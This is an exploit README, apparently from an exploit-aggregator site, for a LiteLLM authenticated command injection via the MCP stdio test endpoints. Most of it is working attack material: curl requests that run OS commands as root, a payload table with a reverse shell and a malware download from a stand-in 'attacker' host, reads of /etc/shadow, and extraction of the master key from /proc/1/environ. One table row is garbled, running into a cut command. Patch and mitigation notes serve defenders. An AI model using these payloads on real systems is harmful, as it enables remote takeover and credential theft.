Share
## https://sploitus.com/exploit?id=47564AB3-627D-51FA-A9A8-571279747153
# CVE-2026-42271 — LiteLLM Authenticated Command Injection via MCP stdio Test Endpoints

> **LiteLLM** `POST /mcp-rest/test/connection` & `POST /mcp-rest/test/tools/list` — Authenticated command injection via MCP stdio transport. Any valid API key can execute arbitrary OS commands as **root** (in default Docker deployment).
>
> **镜像已通过 digest 固定**:vulnerable 容器固定为 LiteLLM **v1.82.6**,确保长期可复现。

| Field | Value |
|-------|-------|
| CVE | **CVE-2026-42271** |
| CVSS v4.0 | **8.7 (HIGH)** — `CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N` |
| CVSS v3.1 | **8.8 (HIGH)** — `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` |
| CWE | CWE-77 / CWE-78 (OS Command Injection) |
| Affected | LiteLLM **>= 1.74.2,  /tmp/pwned"]
  }'
```

### Verify Execution

```bash
# Check that the command executed inside the container
docker exec litellm-cve cat /tmp/pwned
# Output: uid=0(root) gid=0(root) groups=0(root),0(root),...
```

The API returns `"Failed to connect to MCP server"` because the spawned process doesn't speak the MCP protocol — but the **command has already been executed** with root privileges.

---

## Attack Scenarios

| Scenario | Payload |
|----------|---------|
| **Basic RCE** | `"args": ["-c", "id > /tmp/pwned"]` |
| **Read files** | `"args": ["-c", "cat /etc/shadow > /tmp/out"]` |
| **Exfiltrate env** | `"args": ["-c", "cat /proc/1/environ | tr '\\0' '\\n' > /tmp/env"]` → contains `LITELLM_MASTER_KEY` |
| **Reverse shell** | `"args": ["-c", "bash -i >& /dev/tcp/attacker/4444 0>&1"]` |
| **Persistence** | `"args": ["-c", "curl http://attacker/malware -o /tmp/backdoor && chmod +x /tmp/backdoor"]` |

---

## Vulnerable Endpoints

### `POST /mcp-rest/test/connection`

Tests an MCP server connection. With stdio transport, spawns the provided command.

### `POST /mcp-rest/test/tools/list`

Lists tools from a test MCP server. Same behavior — spawns the provided command when using stdio transport.

### Request Body Format

```json
{
  "transport": "stdio",
  "command": "bash",
  "args": ["-c", ""],
  "env": {
    "PATH": "/usr/bin:/bin"
  }
}
```

| Field | Type | Required | Description |
|-------|------|----------|-------------|
| `transport` | string | Yes | Must be `"stdio"` for command injection |
| `command` | string | Yes | Executable to spawn (e.g., `bash`, `python`, `curl`) |
| `args` | array | Yes | Arguments passed to the command |
| `env` | object | No | Environment variables for the subprocess |

---

## Patch Analysis (v1.83.7)

The fix added two layers of defense:

1. **Command whitelist** via `validate_transport_fields()` — only allows: `npx`, `uvx`, `python`, `python3`, `node`, `docker`, `deno`
2. **Role-based access control** — both endpoints now require `PROXY_ADMIN` role

---

## Repository Structure

```
CVE-2026-42271/
├── README.md                  # This file
├── docker-compose.yml         # One-command vulnerable environment (pinned to v1.82.6)
├── requirements.txt           # Dependencies
├── exploit/
│   ├── exploit.py             # Full exploit script
│   └── payload.py             # Payload generation module
├── docs/
│   └── advisory.md            # Advisory reference
└── screenshots/               # Proof screenshots
```

---

## Mitigation

1. **Upgrade** to LiteLLM **v1.83.7+** (command whitelist + `PROXY_ADMIN` role check)
2. **Block** `/mcp-rest/test/connection` and `/mcp-rest/test/tools/list` at reverse proxy
3. **Restrict** API key privileges — rotate keys if compromise is suspected
4. **Run as non-root** in Docker: `docker run --user 1000:1000 ...`

---

## ⚠️ 注意:MCP SDK 环境变量隔离

复现 **5.7 节(提取进程环境变量)** 时需注意:**MCP Python SDK v1.25.0+** 在创建 stdio 子进程时,**不会继承 LiteLLM 父进程的环境变量**。SDK 通过 `get_default_environment()` 仅传递 `HOME` 和 `PATH`,再合并用户显式指定的 env 字段。

因此 `env > /tmp/env_dump` **无法捕获 `LITELLM_MASTER_KEY`**。

**正确做法**:通过读取 LiteLLM 主进程的 `/proc/1/environ` 提取环境变量:

```bash
# 提取环境变量(通过 /proc/1/environ)
curl -s -X POST \
  -H "Authorization: Bearer sk-litellm-master-key" \
  -H "Content-Type: application/json" \
  http://localhost:4000/mcp-rest/test/tools/list \
  -d '{
    "transport": "stdio",
    "command": "bash",
    "args": ["-c", "cat /proc/1/environ | tr \"\\0\" \"\\n\" > /tmp/env_dump"]
  }'

# 查看结果
docker exec litellm-cve cat /tmp/env_dump | grep -E "LITELLM|MASTER"
# 输出: LITELLM_MASTER_KEY=sk-litellm-master-key
```

详情见 [复现报告](CVE-2026-42271_漏洞复现报告.docx) 5.7 节。

---

## References

- [GitHub Security Advisory GHSA-v4p8-mg3p-g94g](https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g)
- [GitLab Advisory](https://advisories.gitlab.com/pypi/litellm/CVE-2026-42271/)
- [NVD Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-42271)
- [v1.83.7-stable Release](https://github.com/BerriAI/litellm/releases/tag/v1.83.7-stable)
- [LiteLLM MCP Documentation](https://docs.litellm.ai/docs/mcp)

---

> **Disclaimer:** This content is provided for **educational purposes and authorized security testing only.**